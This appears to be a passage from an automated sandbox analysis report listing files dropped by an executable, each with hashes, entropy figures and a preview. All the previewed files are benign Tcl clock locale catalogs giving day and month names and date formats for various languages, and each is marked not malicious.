                                                                                                                                                                                                                              SHA-256:4C0EB07F0FCB36DD12A3F7EDD6531616611ABF62BF7705B5A37CC59098221D5D
                                                                                                                                                                                                                              SHA-512:D748127CC615584901D35B6492EC566448B6C4DA6363858B5145921E9CD09490355CF4315F0F7A8542AA12790CD3432011A643A3A8F74B0119DB0DCE19FD68A4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset mk DAYS_OF_WEEK_ABBREV [list \.. "\u043d\u0435\u0434."\.. "\u043f\u043e\u043d."\.. "\u0432\u0442."\.. "\u0441\u0440\u0435."\.. "\u0447\u0435\u0442."\.. "\u043f\u0435\u0442."\.. "\u0441\u0430\u0431."].. ::msgcat::mcset mk DAYS_OF_WEEK_FULL [list \.. "\u043d\u0435\u0434\u0435\u043b\u0430"\.. "\u043f\u043e\u043d\u0435\u0434\u0435\u043b\u043d\u0438\u043a"\.. "\u0432\u0442\u043e\u0440\u043d\u0438\u043a"\.. "\u0441\u0440\u0435\u0434\u0430"\.. "\u0447\u0435\u0442\u0432\u0440\u0442\u043e\u043a"\.. "\u043f\u0435\u0442\u043e\u043a"\.. "\u0441\u0430\u0431\u043e\u0442\u0430"].. ::msgcat::mcset mk MONTHS_ABBREV [list \.. "\u0458\u0430\u043d."\.. "\u0444\u0435\u0432."\.. "\u043c\u0430\u0440."\.. "\u0430\u043f\u0440."\.. "\u043c\u0430\u0458."\.. "\u0458\u0443\u
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1846
                                                                                                                                                                                                                              Entropy (8bit):4.220147808639664
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR833cXh48Vc7VczfVczPmzNVcYVcR0prdSmS68FezUVcYVcR0prdSmS68FeoV:43K4S+0prjS68Yh0prjS68nV
                                                                                                                                                                                                                              MD5:07F99E0A05083B10F80A4D6867163B23
                                                                                                                                                                                                                              SHA1:B6036C7DA8043E3401583D03831E7A4BF755D93D
                                                                                                                                                                                                                              SHA-256:AE873BF5484EACBBE179913D43451BE53378FA701B5D81594D052266B8A09AF0
                                                                                                                                                                                                                              SHA-512:3A032C81B8FBFEE6EB66C1538CBD16329A1B393E4684B4E9B3FBCDD6344CE8AD34FA699F76EF953B3EB597D8E253345F54C2E92E7A43611C721038BCC2471EA2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset mr DAYS_OF_WEEK_FULL [list \.. "\u0930\u0935\u093f\u0935\u093e\u0930"\.. "\u0938\u094b\u092e\u0935\u093e\u0930"\.. "\u092e\u0902\u0917\u0933\u0935\u093e\u0930"\.. "\u092e\u0902\u0917\u0933\u0935\u093e\u0930"\.. "\u0917\u0941\u0930\u0941\u0935\u093e\u0930"\.. "\u0936\u0941\u0915\u094d\u0930\u0935\u093e\u0930"\.. "\u0936\u0928\u093f\u0935\u093e\u0930"].. ::msgcat::mcset mr MONTHS_ABBREV [list \.. "\u091c\u093e\u0928\u0947\u0935\u093e\u0930\u0940"\.. "\u092b\u0947\u092c\u0943\u0935\u093e\u0930\u0940"\.. "\u092e\u093e\u0930\u094d\u091a"\.. "\u090f\u092a\u094d\u0930\u093f\u0932"\.. "\u092e\u0947"\.. "\u091c\u0942\u0928"\.. "\u091c\u0941\u0932\u0948"\.. "\u0913\u0917\u0938\u094d\u091f"\.. "\u0938\u0947\u092a\u094d\u091f\u0947\u0902\u092c\u0930"\.. "\u0913\u0915\u094d\u091f\u0
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.89440333975705
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoGNv+IZoGU3v6ry/5oGNo+3v+6f6HyFvn:4EnLB383Zvlw3v6ry/ZF3vmSVn
                                                                                                                                                                                                                              MD5:67368E8A5715860BABD44E54A168192F
                                                                                                                                                                                                                              SHA1:7790D4B4B28FE5E38AB11CD037FFB826A8EB77FD
                                                                                                                                                                                                                              SHA-256:B7B1D379355A1D278E13EF557A887A662E84FB6A9B62B8E19A27927926270EF9
                                                                                                                                                                                                                              SHA-512:E95C90CFFA7CC4E61026FC328A4AA0BEE6A54A0061BA0B9459F9F0F4B008DD36F81BC9B8D8B964FA051FCEAB7FECE6D107CD456B3FD01A83B4900ECC3A0BCFA4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset mr_IN DATE_FORMAT "%d %M %Y".. ::msgcat::mcset mr_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset mr_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):957
                                                                                                                                                                                                                              Entropy (8bit):4.018924167342869
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:4EnLB383Zm/aufodZmt+JHEA7UVRosmAL/7Idzr43xRRosuL1PJHWZ6tHhHjv:4aR83ZsauSHJkA7umE/72UD21PJWZ0hT
                                                                                                                                                                                                                              MD5:7E6A943B7D82404F61BDBD95682073CD
                                                                                                                                                                                                                              SHA1:B96DBB1738F293D2842FDCEDF2DEF13004F77A8D
                                                                                                                                                                                                                              SHA-256:970B2F3ECC04980FCC2F9531CA6CE2BF36BC12942CB614BF70313B4CB0508985
                                                                                                                                                                                                                              SHA-512:12F5A5F7A170EE79D1F4398E96FF2DE84472027C5B5003DE7E86F46713E3F0997439E2EBA03FFB7DB611F0CE0E06EB149F5BD08ED2AA0409DB8348867487FFFD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ms DAYS_OF_WEEK_ABBREV [list \.. "Aha"\.. "Isn"\.. "Sei"\.. "Rab"\.. "Kha"\.. "Jum"\.. "Sab"].. ::msgcat::mcset ms DAYS_OF_WEEK_FULL [list \.. "Ahad"\.. "Isnin"\.. "Selasa"\.. "Rahu"\.. "Khamis"\.. "Jumaat"\.. "Sabtu"].. ::msgcat::mcset ms MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mac"\.. "Apr"\.. "Mei"\.. "Jun"\.. "Jul"\.. "Ogos"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dis"\.. ""].. ::msgcat::mcset ms MONTHS_FULL [list \.. "Januari"\.. "Februari"\.. "Mac"\.. "April"\.. "Mei"\.. "Jun"\.. "Julai"\.. "Ogos"\.. "September"\.. "Oktober"\.. "November"\.. "Disember"\.. ""]..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):265
                                                                                                                                                                                                                              Entropy (8bit):4.818053174805798
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoChFfluoChF+3v6xyFjoCh++3vflm68vn:4EnLB383xPflwe3v6gZl3vflm6+n
                                                                                                                                                                                                                              MD5:A02F11BE0DF920E63E7A3ACCE746E32D
                                                                                                                                                                                                                              SHA1:4A8B1EF1A6F8A5FD022042D6E009A01E4B0FEBD3
                                                                                                                                                                                                                              SHA-256:F5B859D8DD2A2B5F756E39B0DFEB26B95878D2F54BA3CE46C56F0F26CF2B554B
                                                                                                                                                                                                                              SHA-512:5F9AF8C89F491CB4C158ED73EA4CF32E6A83CF44A94DA6FE1A962C58199BF2348530F3DEFA0C6F433BA3ADEF81AE9B3884F30CD7A841B159D52F9F21008B4F92
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ms_MY DATE_FORMAT "%A %d %b %Y".. ::msgcat::mcset ms_MY TIME_FORMAT_12 "%I:%M:%S %z".. ::msgcat::mcset ms_MY DATE_TIME_FORMAT "%A %d %b %Y %I:%M:%S %z %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):717
                                                                                                                                                                                                                              Entropy (8bit):4.55153350337982
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:4EnLB383VYmxWHWog4QUbxMmAMMiGZu+3v6ay/GK3vZsSVn:4aR83VYsxonQ2MmVVGRvjCGsvGSV
                                                                                                                                                                                                                              MD5:D8BBEC2F8935054E6081BB5E4AE8F7E3
                                                                                                                                                                                                                              SHA1:33FE6D51A284B8760BC6F442329B10374F506BDA
                                                                                                                                                                                                                              SHA-256:7DBC4E82D82FDE8CDF522FA10E082289D46B0C1A4A7D7A5FA83FF116677F052B
                                                                                                                                                                                                                              SHA-512:BF39C75DD6B3625897D7D44AC253AF5656CA21D0B394F78611584E2606CBC419C4A02353542D23393BEBCCF0CB4D861CDECD61AD89339F78C0260E966B495777
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset mt DAYS_OF_WEEK_ABBREV [list \.. "\u0126ad"\.. "Tne"\.. "Tli"\.. "Erb"\.. "\u0126am"\.. "\u0120im"].. ::msgcat::mcset mt MONTHS_ABBREV [list \.. "Jan"\.. "Fra"\.. "Mar"\.. "Apr"\.. "Mej"\.. "\u0120un"\.. "Lul"\.. "Awi"\.. "Set"\.. "Ott"\.. "Nov"].. ::msgcat::mcset mt BCE "QK".. ::msgcat::mcset mt CE "".. ::msgcat::mcset mt DATE_FORMAT "%A, %e ta %B, %Y".. ::msgcat::mcset mt TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset mt DATE_TIME_FORMAT "%A, %e ta %B, %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1209
                                                                                                                                                                                                                              Entropy (8bit):4.313626715960843
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83B0tSYuZrIsmYmPAxyIQ4HU92W16EL3Tvav31:43qhuZrIPAt04yTcF
                                                                                                                                                                                                                              MD5:42D02C3CAF28BE4994F27CEF5A183AB7
                                                                                                                                                                                                                              SHA1:DC411E8AC12C3D588AB2F3A3C95A75D8689AD402
                                                                                                                                                                                                                              SHA-256:534C5DACEF12F818FAF4ED806997A559F95D591F1B6236B0C30B07A107DD13F3
                                                                                                                                                                                                                              SHA-512:0BE27572106324FE2B6CDFF4513500DE7582AD1ABEF451FFC62B2050D3875A149DDDB66451E1B3F5BA9216268E9998D2A1C1E8343BBB9EF97947DA054B82818E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nb DAYS_OF_WEEK_ABBREV [list \.. "s\u00f8"\.. "ma"\.. "ti"\.. "on"\.. "to"\.. "fr"\.. "l\u00f8"].. ::msgcat::mcset nb DAYS_OF_WEEK_FULL [list \.. "s\u00f8ndag"\.. "mandag"\.. "tirsdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "l\u00f8rdag"].. ::msgcat::mcset nb MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "mai"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "des"\.. ""].. ::msgcat::mcset nb MONTHS_FULL [list \.. "januar"\.. "februar"\.. "mars"\.. "april"\.. "mai"\.. "juni"\.. "juli"\.. "august"\.. "september"\.. "oktober"\.. "november"\.. "desember"\.. ""].. ::msgcat::mcset nb BC
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1129
                                                                                                                                                                                                                              Entropy (8bit):4.235969198645435
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR837Ed+RxRMZZsmUmnZAEEHM92WFU5vtrvs:43AAHRMZZPnZALsCtt7s
                                                                                                                                                                                                                              MD5:B9B949794203D204628D4DBEA29587AE
                                                                                                                                                                                                                              SHA1:1642D8040144469B5C359E80693E68036F87B849
                                                                                                                                                                                                                              SHA-256:9E2FE3851CF13EC79A9B10A09B01CEB0A26044AE0DC90A4E00BE57745E854C79
                                                                                                                                                                                                                              SHA-512:0CCCCF6D61423CEE0389C3BA1A8E94F2B092C53465D1937F5595AF91E46DD38B318D6C7EE3D88B89F32BFB952C0D55E0E67B46D7DF306ECA6690E283ADEB2CB9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nl DAYS_OF_WEEK_ABBREV [list \.. "zo"\.. "ma"\.. "di"\.. "wo"\.. "do"\.. "vr"\.. "za"].. ::msgcat::mcset nl DAYS_OF_WEEK_FULL [list \.. "zondag"\.. "maandag"\.. "dinsdag"\.. "woensdag"\.. "donderdag"\.. "vrijdag"\.. "zaterdag"].. ::msgcat::mcset nl MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mrt"\.. "apr"\.. "mei"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset nl MONTHS_FULL [list \.. "januari"\.. "februari"\.. "maart"\.. "april"\.. "mei"\.. "juni"\.. "juli"\.. "augustus"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat::mcset nl DATE_FORM
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):286
                                                                                                                                                                                                                              Entropy (8bit):4.865165930946383
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xo4gPPdjog9X3vLjog9X3v6mjo49+3vnFDoAkvn:4EnLB3835gHdPF3vjF3v64I3v9dmn
                                                                                                                                                                                                                              MD5:3261F397ED0291368FF1881E7BA08ECE
                                                                                                                                                                                                                              SHA1:7147ABB62034EB152B1FED9246A533535F07372C
                                                                                                                                                                                                                              SHA-256:77A69DD60D171B321512B14794E75A66FF753410C007997B310790D86E09B057
                                                                                                                                                                                                                              SHA-512:C1526F454FA594DAD056B056F76F01D8B2AB713D04EB2A3643416B8E741B248CC94E000BAEE5B0F60436B88B1216FB1DE7F7C3FA456D4A4FBDE24F97C3B739B8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nl_BE DATE_FORMAT "%d-%m-%y".. ::msgcat::mcset nl_BE TIME_FORMAT "%T".. ::msgcat::mcset nl_BE TIME_FORMAT_12 "%T".. ::msgcat::mcset nl_BE DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1200
                                                                                                                                                                                                                              Entropy (8bit):4.282788574144479
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83tCtrJwuQrIsmYmLAxyIQ4HU92W1W4/3Hv+v31:434suQrILAt0EafIF
                                                                                                                                                                                                                              MD5:985E97517C2BF37719A618F575DF392C
                                                                                                                                                                                                                              SHA1:65BC07FC3A955300ED09B7485F90AEC18CBAD43F
                                                                                                                                                                                                                              SHA-256:06FA2D6D8C59D0B8EAC2EDE5AB0DDB8B6E095D1A023B1966FCE3B65916FA14FB
                                                                                                                                                                                                                              SHA-512:75BC14DBAD147A98D32D2AF0BE0BE50F115BB9C3BBE283B53977B9F264A055734B30F6B1C4EEE9686F1874D178C535111731C92D495B7D370FB17213B65C9A40
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nn DAYS_OF_WEEK_ABBREV [list \.. "su"\.. "m\u00e5"\.. "ty"\.. "on"\.. "to"\.. "fr"\.. "lau"].. ::msgcat::mcset nn DAYS_OF_WEEK_FULL [list \.. "sundag"\.. "m\u00e5ndag"\.. "tysdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "laurdag"].. ::msgcat::mcset nn MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "mai"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "des"\.. ""].. ::msgcat::mcset nn MONTHS_FULL [list \.. "januar"\.. "februar"\.. "mars"\.. "april"\.. "mai"\.. "juni"\.. "juli"\.. "august"\.. "september"\.. "oktober"\.. "november"\.. "desember"\.. ""].. ::msgcat::mcset nn BCE "f.Kr."
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1263
                                                                                                                                                                                                                              Entropy (8bit):4.459506202908786
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83lUj0ORGgIzdW6RDYKG7FwRc0ypvOvX:43+HMg2W6RDYnFwRc0ydYX
                                                                                                                                                                                                                              MD5:79AB7C13AA3833A1DAEADDB1144CCE55
                                                                                                                                                                                                                              SHA1:C01ABC2F16549CAEC6B081448B2CBA88A680E250
                                                                                                                                                                                                                              SHA-256:61462C325DB0065352D8155307F949869862A86CAC67AD7BB6703F57A7FA2FF3
                                                                                                                                                                                                                              SHA-512:79EB696164FDDD9B121558C2780E54E295FF2DC4D8E87A0DE507B4F2925612721A98FF5010199CB68CF894ACA7A07884E9E02F3DC1E078D241431E3DC884C0A1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset pl DAYS_OF_WEEK_ABBREV [list \.. "N"\.. "Pn"\.. "Wt"\.. "\u015ar"\.. "Cz"\.. "Pt"\.. "So"].. ::msgcat::mcset pl DAYS_OF_WEEK_FULL [list \.. "niedziela"\.. "poniedzia\u0142ek"\.. "wtorek"\.. "\u015broda"\.. "czwartek"\.. "pi\u0105tek"\.. "sobota"].. ::msgcat::mcset pl MONTHS_ABBREV [list \.. "sty"\.. "lut"\.. "mar"\.. "kwi"\.. "maj"\.. "cze"\.. "lip"\.. "sie"\.. "wrz"\.. "pa\u017a"\.. "lis"\.. "gru"\.. ""].. ::msgcat::mcset pl MONTHS_FULL [list \.. "stycze\u0144"\.. "luty"\.. "marzec"\.. "kwiecie\u0144"\.. "maj"\.. "czerwiec"\.. "lipiec"\.. "sierpie\u0144"\.. "wrzesie\u0144"\.. "pa\u017adziernik"\.. "listopad"\..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1177
                                                                                                                                                                                                                              Entropy (8bit):4.394980756969744
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83CYkjBc1yHYJt//0/I31YMY47flV7YaqgCyt9Fo8g6Gtvt76svi:43C5LHcNnxJ9Ltg6Gpt76Ki
                                                                                                                                                                                                                              MD5:8F53B3571DD29E12BD33349CFA32F28F
                                                                                                                                                                                                                              SHA1:C125E059B8BFE5FECD482D1A1DA50B8678872BF6
                                                                                                                                                                                                                              SHA-256:6F6EEEDDCF232BDCB952592A144810CED44A1CBB4BCC2C062D5F98D441505380
                                                                                                                                                                                                                              SHA-512:5CD7E7097B720E5399795126A71348816CBA697FD8F14160779E982ADAB00D5994978E2F9445785B0DE62F6F14232278AD1A65BC53730CA58D676B057F0BC406
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset pt DAYS_OF_WEEK_ABBREV [list \.. "Dom"\.. "Seg"\.. "Ter"\.. "Qua"\.. "Qui"\.. "Sex"\.. "S\u00e1b"].. ::msgcat::mcset pt DAYS_OF_WEEK_FULL [list \.. "Domingo"\.. "Segunda-feira"\.. "Ter\u00e7a-feira"\.. "Quarta-feira"\.. "Quinta-feira"\.. "Sexta-feira"\.. "S\u00e1bado"].. ::msgcat::mcset pt MONTHS_ABBREV [list \.. "Jan"\.. "Fev"\.. "Mar"\.. "Abr"\.. "Mai"\.. "Jun"\.. "Jul"\.. "Ago"\.. "Set"\.. "Out"\.. "Nov"\.. "Dez"\.. ""].. ::msgcat::mcset pt MONTHS_FULL [list \.. "Janeiro"\.. "Fevereiro"\.. "Mar\u00e7o"\.. "Abril"\.. "Maio"\.. "Junho"\.. "Julho"\.. "Agosto"\.. "Setembro"\.. "Outubro"\.. "Novembro"\.. "Dezembro"
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):286
                                                                                                                                                                                                                              Entropy (8bit):4.8608779725401785
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xofm6GPWWjofAW3vLjofAW3v6mjofm6T+3vnFDoAkvn:4EnLB383+NGdg93vk93v6fNK3v9dmn
                                                                                                                                                                                                                              MD5:A2626EA95C2480FEA68906AE6A1F6993
                                                                                                                                                                                                                              SHA1:A0592902337C00FC2E70B1DFB3A42453A86535BB
                                                                                                                                                                                                                              SHA-256:320BE7D5B730091E6FA35F196314737261C8E154577DCF6AC8C2057D44394AD7
                                                                                                                                                                                                                              SHA-512:9801A87D024565676D4F3EAF0702C213E59FC2B6719D8BE95C19C9ED53FC43487F65F5408378B401A2B4C2BD4E2E391C2D848CA87739A6082AB7766EC6B9EFE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset pt_BR DATE_FORMAT "%d-%m-%Y".. ::msgcat::mcset pt_BR TIME_FORMAT "%T".. ::msgcat::mcset pt_BR TIME_FORMAT_12 "%T".. ::msgcat::mcset pt_BR DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1224
                                                                                                                                                                                                                              Entropy (8bit):4.350784108088039
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83coPUMSeZmkTMm41icpK+7ZVoImEcVUCWdvHvWIn:43lPHFmkm1iMVoxEc+CWZPWIn
                                                                                                                                                                                                                              MD5:F6575EC17966320106FF7ABDFB3186E2
                                                                                                                                                                                                                              SHA1:68C6B72D664FDA27450FCE8B5734AB627CE825D7
                                                                                                                                                                                                                              SHA-256:25ED6AC7A353E23B954B98611AE3B7E56BDCF2B0CB0DB358253CFB8BEBBB831C
                                                                                                                                                                                                                              SHA-512:E564543231922A17C898419545BFA65E5E31FE9F005FDD201B735CFDE08E96FB3B98349C2A7959E29CA8F7E6934B0C4C6DE6B5E67209D0DD9A7746DFEBF037B3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ro DAYS_OF_WEEK_ABBREV [list \.. "D"\.. "L"\.. "Ma"\.. "Mi"\.. "J"\.. "V"\.. "S"].. ::msgcat::mcset ro DAYS_OF_WEEK_FULL [list \.. "duminic\u0103"\.. "luni"\.. "mar\u0163i"\.. "miercuri"\.. "joi"\.. "vineri"\.. "s\u00eemb\u0103t\u0103"].. ::msgcat::mcset ro MONTHS_ABBREV [list \.. "Ian"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Mai"\.. "Iun"\.. "Iul"\.. "Aug"\.. "Sep"\.. "Oct"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset ro MONTHS_FULL [list \.. "ianuarie"\.. "februarie"\.. "martie"\.. "aprilie"\.. "mai"\.. "iunie"\.. "iulie"\.. "august"\.. "septembrie"\.. "octombrie"\.. "noiembrie"\.. "decembrie"\.. ""].. ::msgcat:
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2091
                                                                                                                                                                                                                              Entropy (8bit):4.2886524607041006
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:43D+pQ7keidQfRQPgQHB81Z/sFIAZSQWQXQrQxJQjQRnQBFQiWftkWt:26pgkeoSnpjA4tMYiJcCMFmVRt
                                                                                                                                                                                                                              MD5:9F1C8DD58550558977821FD500E7C0E0
                                                                                                                                                                                                                              SHA1:EFDD809BC2872A5BE0E353D31BE6D7D72E4B829C
                                                                                                                                                                                                                              SHA-256:BB35BB6F07BAEF72C329EC3E95D6527A2736070EE2FFE5DE227E1FF0332390F8
                                                                                                                                                                                                                              SHA-512:AA3C5C40AE9D342F8287958355C3321CF60566AD3E84E3D18D782FC022A998DA275506A61010A65D2E7D7578F2919C47C63AB0BA63A38800AA48D4B88ACE54D3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
